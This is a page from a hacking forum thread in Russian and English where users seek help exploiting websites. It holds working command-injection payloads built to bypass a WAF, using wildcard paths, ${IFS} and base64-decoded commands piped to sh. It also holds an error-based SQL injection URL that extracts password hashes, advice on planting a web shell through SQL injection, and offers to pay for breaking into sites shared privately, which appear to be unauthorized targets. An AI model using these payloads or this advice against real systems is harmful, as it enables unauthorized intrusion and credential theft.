Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Gorbachev

    Gorbachev Active Member

    Joined:
    23 Mar 2017
    Messages:
    246
    Likes Received:
    114
    Reputations:
    58
    Ну вообще, там речь про системные команды, а не php RCE )
     
  2. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    453
    Likes Received:
    80
    Reputations:
    20
    Чем искать NoSQL Injection сканер бурпа умеет? есть расширения под ним?
     
  3. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    210
    Likes Received:
    67
    Reputations:
    0
    Может кто подскажет по данному вопросу?
    PS: В какой ветке можно разместить пост, из разряда помощь со скулей, скину на пиво(
    А то подобных тем не видел в услугах(
     
  4. hibar1Xs

    hibar1Xs Member

    Joined:
    30 Jan 2019
    Messages:
    9
    Likes Received:
    5
    Reputations:
    3
    • Фрагментированные SQL иньекции
    • HTTP Parameter Pollution
    https://www.ptsecurity.com/upload/corporate/ru-ru/analytics/PT-devteev-CC-WAF.pdf
    https://www.ptsecurity.com/upload/c...s/Ю.Гольцев_Уязвимости_web_сложные_случаи.pdf
     
    kacergei and BillyBons like this.
  5. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    256
    Likes Received:
    73
    Reputations:
    1
    hi all
    os command injection in post data, mod_sec waf..when try echo test, it works
    but when try uname, ls, pwd, dir waf deletes command, what real advice ?
     
  6. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    498
    Likes Received:
    894
    Reputations:
    314
    Hi, try this:
    Code:
    /b?n/?s /
    /b?n/un?m?
    /?in/e??o "bHMgLWxh" | /?sr/b?n/b??e64 -d | /b?n/?h
    
     
    dmax0fw likes this.
  7. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    256
    Likes Received:
    73
    Reputations:
    1
    @crlf thank you for reply, I tried these variant for reading /etc/passwd, and now also tried your variants, but also WAF cuts functions (((

    request
    response
     
  8. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    498
    Likes Received:
    894
    Reputations:
    314
    It seems that there are some unknown logic on backend, not traditional WAF. Try to fuzz and detect the white/black sequences and conduct the attack vector in accordance with the circumstances. For example:

    Code:
    ;id;
    `id`
    ;sleep 100;
    `sleep 100`
    uname${IFS}-a
    echo$IFS"bHMgLWxh"|base64$IFS-d|sh
    `echo$IFS"bHMgLWxh"|base64$IFS-d|sh>log.txt`
    
    and so on...
    
    Also check this.
     
    man474019 and dmax0fw like this.
  9. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,023
    Likes Received:
    1,389
    Reputations:
    53
    А ты чего ожидал от твоей команды ?
     
  10. xmp

    xmp Member

    Joined:
    14 Dec 2018
    Messages:
    13
    Likes Received:
    9
    Reputations:
    4
    Подскажите как загрузить шелл через SQLi
    union based иньекция
    FILE_PRIV = Y (5.5.60-log)
    Включен --secure-file-priv соответственно into outfile не рабоатет.
     
  11. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    256
    Likes Received:
    73
    Reputations:
    1
    hi
    see if magic_quotes_gpc ON or OFF
    you must find writable path/folder to upload your shell
    and also you can try LOAD DATA INFILE
     
  12. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    256
    Likes Received:
    73
    Reputations:
    1
    Hi friends
    there is sqli
    Code:
    https://www.site.com/1'*updatexml(1,concat(0x3A,(select(group_concat(pass))from(mdb.login))),1)*'/services/test
    but in output it cuts 1 symbol from md5 hash, what can u say about this ? what can i do ?
    Thanks
     
  13. xmp

    xmp Member

    Joined:
    14 Dec 2018
    Messages:
    13
    Likes Received:
    9
    Reputations:
    4
    Yes i can upload file data to table, but im looking for way write data to file.
    magic_quotes_gpc = off
     
  14. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,023
    Likes Received:
    1,389
    Reputations:
    53
    попробуй переопределить, но скорее всего никак
     
    xmp likes this.
  15. xmp

    xmp Member

    Joined:
    14 Dec 2018
    Messages:
    13
    Likes Received:
    9
    Reputations:
    4
    Запись на включение находится в /etc/my.cnf
    Верно понимаю что ты имеешь в виду?

     
  16. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,023
    Likes Received:
    1,389
    Reputations:
    53
    https://bugs.mysql.com/bug.php?id=50373
     
    xmp likes this.
  17. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    262
    Likes Received:
    97
    Reputations:
    25
    Есть уязвимость, Cross site scripting в куках
    GET site/eta.php HTTP/1.1
    Referer: https://www.google.com/
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/45.0.2228.0 Safari/537.21
    Cookie: cache=Cross site scripting

    Есть пример эксплуатации такой уязвимости ?
     
  18. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Может ли кто попробовать раскрутить уязвимость руками, в sqlmap никак не идет, но думаю надо руками. Сайт скину в личку. На пиво скину)
     
  19. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,023
    Likes Received:
    1,389
    Reputations:
    53
    В чём проблема?
     
  20. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    256
    Likes Received:
    73
    Reputations:
    1
    any help ??
     
Loading...